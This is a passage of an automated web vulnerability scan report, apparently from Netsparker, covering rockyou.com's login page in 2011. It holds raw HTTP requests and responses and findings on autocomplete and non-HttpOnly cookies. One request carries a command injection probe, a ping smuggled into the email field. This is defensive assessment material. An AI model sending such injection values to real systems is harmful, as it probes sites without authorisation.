| mode | POST | create |
| user | POST | 3 |
| pass | POST | 3 |
| display_name | POST | Ronald Smith |
| toscheck | POST | 1 |
Request
POST /login.php HTTP/1.1
Referer: http://www.rockyou.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303163974; ctid=2; sns_type=facebook.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 152
Accept-Encoding: gzip, deflate
email=%22%26%20ping%20-n%2026%20127.0.0.1%20%26&useEmailPassword=netsparker%40example.com&mode=create&user=3&pass=3&display_name=Ronald+Smith&toscheck=1
Referer: http://www.rockyou.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303163974; ctid=2; sns_type=facebook.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 152
Accept-Encoding: gzip, deflate
email=%22%26%20ping%20-n%2026%20127.0.0.1%20%26&useEmailPassword=netsparker%40example.com&mode=create&user=3&pass=3&display_name=Ronald+Smith&toscheck=1
Response
HTTP/1.0 500 Internal Server Error
Date: Mon, 18 Apr 2011 21:59:36 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=82740 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 337
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
Date: Mon, 18 Apr 2011 21:59:36 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=82740 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 337
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
Auto Complete Enabled
Auto Complete Enabled
1
TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".
Impact
Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.Remedy
Add the attribute
autocomplete="off" to the form tag or to individual "input" fields.Actions to Take
- See the remedy for the solution.
- Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
- Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.
Required Skills for Successful Exploitation
Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.
External References
|
- /login.php
/login.php CONFIRMED |
Identified Field Name
pass
Request
GET /login.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 21:53:52 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 21:53:51 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 21:53:52 GMT; path=/; domain=.rockyou.com,lastlogin=1303163632; expires=Wed, 27-Jul-2011 21:53:52 GMT; path=/; domain=.rockyou.com,sns_type=deleted; expires=Sun, 18-Apr-2010 21:53:51 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=11872 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 8995
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:block"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value=""><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value=""><br /><input type="hidden" name="user" id="user" value=""><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option value="1911&..
Date: Mon, 18 Apr 2011 21:53:52 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 21:53:51 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 21:53:52 GMT; path=/; domain=.rockyou.com,lastlogin=1303163632; expires=Wed, 27-Jul-2011 21:53:52 GMT; path=/; domain=.rockyou.com,sns_type=deleted; expires=Sun, 18-Apr-2010 21:53:51 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=11872 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 8995
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:block"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value=""><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value=""><br /><input type="hidden" name="user" id="user" value=""><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option value="1911&..
Cookie Not Marked As HttpOnly
Cookie Not Marked As HttpOnly
1
TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..
Impact
During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.Actions to Take
- See the remedy for solution
- Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.
Remedy
Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
External References
|
- /login.php
/login.php CONFIRMED |
Identified Cookie
ryuserid
Request
GET /login.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 21:53:52 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
